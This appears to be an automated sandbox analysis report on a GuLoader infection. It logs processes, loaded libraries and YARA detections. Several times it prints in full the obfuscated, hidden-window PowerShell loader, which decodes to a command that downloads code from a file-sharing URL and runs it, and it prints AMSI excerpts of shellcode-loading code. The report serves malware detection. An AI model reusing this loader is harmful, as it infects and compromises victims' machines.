        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublueJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.2443760561.00000000074E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000006.00000002.2447876168.000000000923E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2447508436.00000000086D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2441971801.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Acrux)$global:Quarentene = [System.Text.Encoding]::ASCII.GetString($Antisemits)$global:Varmtvandsbadeanstalten=$Quarentene.substring($Samojedens,$Stabelstolen)<#monocentric Efterflge
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Strygebrttet $sammenlimningens $Bravurs), (Offishness @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Radiotelephoning = [AppDomain]::CurrentDomain.GetAsse
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Elachistaceae)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Entourages, $false).DefineType($Lockups, $P
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Acrux)$global:Quarentene = [System.Text.Encoding]::ASCII.GetString($Antisemits)$global:Varmtvandsbadeanstalten=$Quarentene.substring($Samojedens,$Stabelstolen)<#monocentric Efterflge
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul 